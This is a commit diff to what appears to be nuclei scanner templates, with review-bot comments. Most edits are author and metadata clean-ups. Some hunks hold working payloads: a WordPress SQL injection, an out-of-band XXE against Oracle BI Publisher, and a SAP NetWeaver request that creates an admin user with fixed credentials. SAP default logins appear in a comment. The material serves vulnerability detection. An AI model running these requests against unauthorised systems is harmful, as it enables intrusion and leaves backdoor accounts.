commit 1f36178d37
10  README.md
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
|
||||
| takeovers | 67 | exposures | 105 | technologies | 98 |
|
||||
| misconfiguration | 67 | workflows | 32 | miscellaneous | 22 |
|
||||
| cves | 331 | vulnerabilities | 175 | exposed-panels | 145 |
|
||||
| takeovers | 67 | exposures | 106 | technologies | 99 |
|
||||
| misconfiguration | 67 | workflows | 32 | miscellaneous | 24 |
|
||||
| default-logins | 30 | exposed-tokens | 0 | dns | 9 |
|
||||
| fuzzing | 9 | helpers | 8 | iot | 13 |
|
||||
| fuzzing | 9 | helpers | 7 | iot | 13 |
|
||||
|
||||
**111 directories, 1208 files**.
|
||||
**112 directories, 1216 files**.
|
||||
|
||||
</td>
|
||||
</tr>
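Review bot: the totals line moves from 1208 to 1216 files (+8) while the per-category deltas visible in this table sum to +4 (cves +2, exposures +1, technologies +1, miscellaneous +2, exposed-panels -1, helpers -1); confirm both figures were regenerated from the tree rather than edited by hand, since they are meant to describe the same set of files.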
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2013-2251
|
|||
|
||||
info:
|
||||
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
|
||||
author: exploitation & @dwisiswant0
|
||||
author: exploitation,dwisiswant0
|
||||
severity: critical
|
||||
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
||||
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2017-14849
|
|||
|
||||
info:
|
||||
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
|
||||
author: Random-Robbie
|
||||
author: Random_Robbie
|
||||
severity: high
|
||||
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
|
||||
tags: cve,cve2017,nodejs,lfi
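Review bot: the context line `name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal` uses a range notation that does not read clearly and disagrees with the description's "8.5.0 before 8.6.0"; since this hunk already touches the info block, a name such as `Node.js 8.5.0 - Directory Traversal` would be clearer.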
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
id: CVE-2017-5638
|
||||
info:
|
||||
author: Random Robbie
|
||||
author: Random_Robbie
|
||||
name: Apache Struts2 RCE
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2017-7269
|
|||
|
||||
info:
|
||||
name: Windows Server 2003 & IIS 6.0 RCE
|
||||
author: thomas_from_offensity & @geeknik
|
||||
author: thomas_from_offensity,geeknik
|
||||
severity: critical
|
||||
description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
|
||||
reference:
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2017-7615
|
|||
|
||||
info:
|
||||
name: CVE-2017-7615
|
||||
author: bp0lr & dwisiswant0
|
||||
author: bp0lr,dwisiswant0
|
||||
severity: high
|
||||
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
|
||||
tags: cve,cve2017,mantisbt
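Review bot: `name: CVE-2017-7615` just repeats the id (the CVE-2017-9841 hunk below does the same); a descriptive name drawn from the description, e.g. `MantisBT 2.3.0 - Unauthenticated Password Reset`, makes scan output readable, and the info block is already being edited here.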
|
||||
|
|
|
@ -14,7 +14,7 @@ info:
|
|||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
|
||||
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
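Review bot: the scheme change from `https://{{interactsh-url}}` to `http://{{interactsh-url}}` is not explained; if the intent is to avoid the target rejecting the callback on TLS validation, a short comment on the request line would save the next reader the guess. Note that the matcher in the following hunk accepts `dns` as well as `http`, so a DNS resolution without any HTTP fetch already counts as a hit and the scheme only affects the `http` case.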
|
||||
|
@ -26,4 +26,4 @@ requests:
|
|||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
- "dns"
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2017-9841
|
|||
|
||||
info:
|
||||
name: CVE-2017-9841
|
||||
author: Random-Robbie
|
||||
author: Random_Robbie
|
||||
severity: high
|
||||
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
|
||||
tags: cve,cve2017,php,phpunit,rce
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-1000129
|
|||
|
||||
info:
|
||||
name: Jolokia XSS
|
||||
author: mavericknerd @0h1in9e
|
||||
author: mavericknerd,0h1in9e
|
||||
severity: high
|
||||
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
|
||||
tags: cve,cve2018,jolokia,xss
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-1000861
|
|||
|
||||
info:
|
||||
name: Jenkins 2.138 Remote Command Execution
|
||||
author: dhiyaneshDK & @pikpikcu
|
||||
author: dhiyaneshDK,pikpikcu
|
||||
severity: critical
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
|
||||
tags: cve,cve2018,jenkin,rce
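Review bot: `tags: cve,cve2018,jenkin,rce` (context line) has `jenkin`, which looks like a typo for `jenkins` and would not match a `-tags jenkins` filter; worth fixing while this info block is open.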
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-11409
|
|||
|
||||
info:
|
||||
name: Splunk Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
|
||||
tags: cve,cve2018,splunk
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-11759
|
|||
|
||||
info:
|
||||
name: Apache Tomcat JK Status Manager Access
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: medium
|
||||
reference: https://github.com/immunIT/CVE-2018-11759
|
||||
tags: cve,cve2018,apache
|
||||
|
|
|
@ -17,7 +17,12 @@ requests:
|
|||
words:
|
||||
- "application/x-shockwave-flash"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "javascript:alert(1337)"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
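Review bot: adding a `type: status` matcher for 200 and a body word matcher only tightens this template if the file's `matchers-condition` (outside this hunk) is `and`; with the default `or`, any 200 response satisfies the template and the `application/x-shockwave-flash` header check becomes irrelevant. Please confirm the condition in the surrounding lines.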
|
|
@ -2,7 +2,7 @@ id: CVE-2018-19439
|
|||
|
||||
info:
|
||||
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot,dwisiswant0
|
||||
severity: high
|
||||
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
|
||||
tags: cve,cve2018,oracle,xss
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-20824
|
|||
|
||||
info:
|
||||
name: Atlassian Jira WallboardServlet XSS
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot,dwisiswant0
|
||||
severity: medium
|
||||
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
|
||||
tags: cve,cve2018,atlassian,jira,xss
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-15858
|
|||
|
||||
info:
|
||||
name: Unauthenticated Woody Ad Snippets WordPress Plugin RCE
|
||||
author: dwisiswant0 & fmunozs & patralos
|
||||
author: dwisiswant0,fmunozs,patralos
|
||||
severity: high
|
||||
description: |
|
||||
This template supports the detection part only. See references.
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-17382
|
|||
|
||||
info:
|
||||
name: Zabbix Authentication Bypass
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: critical
|
||||
description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
|
||||
reference: https://www.exploit-db.com/exploits/47467
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-17558
|
||||
info:
|
||||
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
|
||||
author: pikpikcu & madrobot
|
||||
author: pikpikcu,madrobot
|
||||
severity: critical
|
||||
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
tags: cve,cve2019,apache,rce,solr
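Review bot: `refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558` (context line) misspells the key, so the link is not recognised as the template's `reference` field; correct it to `reference:`. The same misspelling appears in the CVE-2019-19985 hunk below.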
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-19985
|
|||
|
||||
info:
|
||||
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
|
||||
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
|
||||
author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
|
||||
severity: medium
|
||||
description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure.
|
||||
refrense: https://www.exploit-db.com/exploits/48698
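Review bot: `refrense:` should be `reference:`; as written the exploit-db link does not land in the reference field.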
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2019-2767
|
||||
|
||||
info:
|
||||
name: Oracle Business Intelligence - Publisher XXE
|
||||
author: madrobot
|
||||
severity: high
|
||||
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
||||
- https://www.exploit-db.com/exploits/46729
|
||||
tags: cve,cve2019,oracle,xxe,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
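Review bot: matching on `dns` only is right for a blind XXE check (the parameter entity `%sp;` fetches `xxe.xml` from the interactsh host, so the DNS lookup is the earliest observable signal), but two small points in the new file: the description's "The supported version that is affected are" should read "The supported versions that are affected are", and `reference: |` stores the two links as one block string rather than a YAML list, which differs from the single-string `reference:` used in the other templates of this commit; pick one form.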
|
|
@ -1,6 +1,6 @@
|
|||
id: CVE-2019-3396
|
||||
info:
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
name: Atlassian Confluence Path Traversal
|
||||
severity: high
|
||||
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-8449
|
|||
|
||||
info:
|
||||
name: JIRA Unauthenticated Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: medium
|
||||
description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
|
||||
reference: |
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-9978
|
|||
|
||||
info:
|
||||
name: WordPress social-warfare RFI
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot,dwisiswant0
|
||||
severity: critical
|
||||
description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
|
||||
reference: https://github.com/mpgn/CVE-2019-9978
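Review bot: the context line `name: WordPress social-warfare RFI` conflicts with the description directly beneath it, which describes stored XSS via the `swp_url` parameter; since the info block is being edited, reconcile the two so the name states the behaviour the template actually checks, and make sure `severity: critical` matches that behaviour.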
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-12720
|
|||
|
||||
info:
|
||||
name: CVE-2020-12720 vBulletin SQLI
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
|
||||
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-5284
|
|||
|
||||
info:
|
||||
name: Next.js .next/ limited path traversal
|
||||
author: Harsh & Rahul & dwisiswant0
|
||||
author: rootxharsh,iamnoooob,dwisiswant0
|
||||
severity: medium
|
||||
description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
|
||||
tags: cve,cve2020,nextjs,lfi
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-5405
|
|||
|
||||
info:
|
||||
name: Spring Cloud Directory Traversal
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: high
|
||||
description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
|
||||
reference: https://pivotal.io/security/cve-2020-5405
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-5902
|
|||
|
||||
info:
|
||||
name: F5 BIG-IP TMUI RCE
|
||||
author: madrobot & dwisiswant0 & ringo
|
||||
author: madrobot,dwisiswant0,ringo
|
||||
severity: high
|
||||
description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
|
||||
reference: |
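Review bot: `severity: high` (context) for an unauthenticated RCE in TMUI is out of step with the other RCE templates in this commit, which are `critical` (CVE-2013-2251, CVE-2017-5638, CVE-2021-22986); since the info block is already being edited, consider aligning it.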
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-6287
|
||||
|
||||
info:
|
||||
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
||||
name: SAP NetWeaver - Remote Admin addition
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2020,sap
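Review bot: the new name `SAP NetWeaver - Remote Admin addition` drops the one thing an operator needs to know before running this template, which the old name stated plainly: it creates an administrative user on the target. Keep that in the name or add a `description:` saying so, because the request body in the next hunk does perform the user creation and leaves an account behind.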
|
||||
|
@ -11,24 +11,32 @@ info:
|
|||
- https://launchpad.support.sap.com/#/notes/2934135
|
||||
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
|
||||
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
|
||||
- https://github.com/chipik/SAP_RECON
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
data: helpers/payloads/CVE-2020-6287.xml
|
||||
raw:
|
||||
- raw:
|
||||
- |
|
||||
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
Connection: close
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
|
||||
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
|
||||
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
|
||||
# userName - sapRpoc6351
|
||||
# password - Secure!PwD8890
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
- "CTCWebServiceSi"
|
||||
- "SOAP-ENV"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
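Review bot: the word matcher (`urn:CTCWebServiceSi`, `CTCWebServiceSi`, `SOAP-ENV` with `condition: and`) only proves the endpoint answered with a SOAP envelope; a SOAP fault for a rejected request contains the same strings, so a 200 plus these words does not confirm the user was created. The `# userName` / `# password` comments document the account the inlined base64 payload creates; with those credentials now fixed in a public template, every host the template fires on is left with a known account, which belongs in the description and is an argument for keeping a non-intrusive detection-only check alongside this one.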
|
||||
|
@ -36,4 +44,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "text/xml"
|
||||
part: header
|
||||
- "SAP NetWeaver Application Server"
|
||||
part: header
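Review bot: the added word `SAP NetWeaver Application Server` sits in the same `words:` list as `text/xml` with no `condition:`, so the matcher's default `or` means a `text/xml` header alone still satisfies it and the new word adds no precision; add `condition: and` if the intent is to require both.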
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-8115
|
|||
|
||||
info:
|
||||
name: Revive Adserver XSS
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot,dwisiswant0
|
||||
severity: medium
|
||||
description: |
|
||||
A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-8512
|
|||
|
||||
info:
|
||||
name: IceWarp WebMail XSS
|
||||
author: pdnuclei & dwisiswant0
|
||||
author: pdteam,dwisiswant0
|
||||
severity: medium
|
||||
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
|
||||
reference: |
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-22986
|
||||
info:
|
||||
name: F5 BIG-IP iControl REST unauthenticated RCE
|
||||
author: Harsh Jaiswal (@rootxharsh) & Rahul Maini (@iamnoooob)
|
||||
author: rootxharsh,iamnoooob
|
||||
severity: critical
|
||||
tags: bigip,cve,cve2021,rce
|
||||
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2021-24285
|
||||
|
||||
info:
|
||||
name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
|
||||
author: ShreyaPohekar
|
||||
severity: critical
|
||||
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
|
||||
tags: cve,cve2021,wordpress,wp-plugin,sqli
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
|
||||
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
|
||||
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Content-Length: 47
|
||||
|
||||
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
|
||||
part: body
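Review bot: `Content-Length: 47` does not match the body; the `action=request_list_request&order_id=1 UNION ALL SELECT ...` line alone is over 200 bytes, so either drop the header and let nuclei compute it or set the correct value, otherwise the server may truncate the request. The marker string in the matcher is consistent with the payload (`0x717a767671` is `qzvvq`, `0x7171786b71` is `qqxkq`, and the long literal between them decodes to the middle of the expected word), so the detection logic itself checks out.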
|
|
@ -2,7 +2,7 @@ id: rabbitmq-default-admin
|
|||
|
||||
info:
|
||||
name: RabbitMQ Default Credentials
|
||||
author: fyoorer & dwisiswant0
|
||||
author: fyoorer,dwisiswant0
|
||||
severity: high
|
||||
tags: rabbitmq,default-login
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: dead-host-with-cname
|
|||
|
||||
info:
|
||||
name: dead-host-with-cname
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: dns
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: adminer-panel
|
||||
info:
|
||||
name: Adminer Login panel
|
||||
author: random-robbie & meme-lord
|
||||
author: random_robbie,meme-lord
|
||||
severity: info
|
||||
reference: https://blog.sorcery.ie/posts/adminer/
|
||||
tags: panel
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: jmx-console
|
||||
info:
|
||||
name: JMX Console
|
||||
author: Yash Anand @yashanand155
|
||||
author: yashanand155
|
||||
severity: low
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: joomla-panel
|
|||
|
||||
info:
|
||||
name: Joomla Panel
|
||||
author: github.com/its0x08
|
||||
author: its0x08
|
||||
severity: info
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: mobileiron-login
|
|||
|
||||
info:
|
||||
name: MobileIron Login
|
||||
author: dhiyaneshDK & @dwisiswant0
|
||||
author: dhiyaneshDK,dwisiswant0
|
||||
Severity: info
|
||||
tags: panel
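Review bot: `Severity: info` (context) is capitalised; the field is `severity` in every other template of this commit, and a case-sensitive loader would treat this template as having no severity. Fix it while the info block is open.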
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: open-stack-dashboard-login
|
|||
|
||||
info:
|
||||
name: OpenStack Dashboard
|
||||
author: dhiyaneshDK & hackergautam
|
||||
author: dhiyaneshDK,hackergautam
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6464
|
||||
tags: panel,openstack
|
||||
|
|
|
@ -2,7 +2,7 @@ id: public-tomcat-manager
|
|||
|
||||
info:
|
||||
name: tomcat manager disclosure
|
||||
author: Ahmed Sherif & geeknik
|
||||
author: Ahmed Sherif,geeknik
|
||||
severity: info
|
||||
tags: panel
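Review bot: `author: Ahmed Sherif,geeknik` keeps a display name with a space while every other hunk in this commit normalises authors to handles (e.g. `Harsh Bothra` to `harshbothra_`); use a handle here too so the comma-separated list is uniform.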
|
||||
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: sap-netweaver-portal-detect
|
||||
id: sap-netweaver-portal
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver Portal detect
|
||||
name: SAP NetWeaver Portal
|
||||
author: organiccrap
|
||||
severity: info
|
||||
tags: panel
|
||||
tags: panel,sap
|
||||
|
||||
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
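Review bot: renaming the id from `sap-netweaver-portal-detect` to `sap-netweaver-portal` changes the identifier anyone filters or allow-lists on; check that no workflow or exclusion list references the old id. The `# SAP Netweaver default creds` comment is invisible in scan output; if the default credentials are worth recording, a `description:` line (or a default-logins template that actually verifies them) would surface the information to operators.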
|
||||
|
|
@ -1,36 +0,0 @@
|
|||
id: sap-recon-detect
|
||||
|
||||
info:
|
||||
name: SAP RECON Finder
|
||||
author: samueladi_ & organiccrap
|
||||
severity: medium
|
||||
tags: panel
|
||||
|
||||
# Source:- https://github.com/chipik/SAP_RECON
|
||||
# This is detection template, please use above poc to exploit this further.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
|
||||
- "{{BaseURL}}/CTCWebService/Config1?wsdl"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- Method Not Allowed
|
||||
- Expected request method POST. Found GET.
|
||||
- Generated by WSDLDefinitionsParser
|
||||
- bns0:Config1Binding
|
||||
- wsdl:definitions
|
||||
- tns:CTCWebServiceSiBinding
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 405
|
||||
- 200
|
||||
condition: or
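Review bot: deleting `sap-recon-detect` removes the only non-intrusive check for the CTCWebService endpoint; it matched WSDL strings on GET requests, whereas the remaining CVE-2020-6287 template in this commit POSTs a user-creation request. Consider keeping a detection-only template (with `tags: panel` corrected to something like `sap,detect`) so operators can scope exposure without modifying targets.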
|
|
@ -2,7 +2,7 @@ id: traefik-dashboard-detect
|
|||
|
||||
info:
|
||||
name: Traefik Dashboard
|
||||
author: schniggie & StreetOfHackerR007
|
||||
author: schniggie,StreetOfHackerR007
|
||||
severity: info
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: webeditors
|
|||
|
||||
info:
|
||||
name: Web Editors
|
||||
author: pwnmachine
|
||||
author: princechaddha
|
||||
severity: info
|
||||
tags: panel
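Review bot: `author: pwnmachine` to `author: princechaddha` changes attribution rather than normalising a handle; if these are the same person that is fine, otherwise the original author credit is lost. The commit message should say which.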
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: wadl-api
|
|||
|
||||
info:
|
||||
name: wadl file disclosure
|
||||
author: 0xrudra & manuelbua
|
||||
author: 0xrudra,manuelbua
|
||||
severity: info
|
||||
tags: exposure,api
|
||||
reference: |
|
||||
|
|
|
@ -2,7 +2,7 @@ id: default-sql-dump
|
|||
|
||||
info:
|
||||
name: MySQL Dump Files
|
||||
author: geeknik & @dwisiswant0
|
||||
author: geeknik,dwisiswant0
|
||||
severity: medium
|
||||
tags: exposure,backup
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: zip-backup-files
|
|||
|
||||
info:
|
||||
name: Compressed Web File
|
||||
author: Toufik Airane & @dwisiswant0
|
||||
author: Toufik Airane,dwisiswant0
|
||||
severity: medium
|
||||
tags: exposure,backup
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: docker-compose-config
|
|||
|
||||
info:
|
||||
name: docker-compose.yml exposure
|
||||
author: meme-lord & blckraven & geeknik
|
||||
author: meme-lord,blckraven,geeknik
|
||||
severity: medium
|
||||
tags: config,exposure,devops
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: exposed-svn
|
|||
|
||||
info:
|
||||
name: Exposed SVN Directory
|
||||
author: udit_thakkur & dwisiswant0
|
||||
author: udit_thakkur,dwisiswant0
|
||||
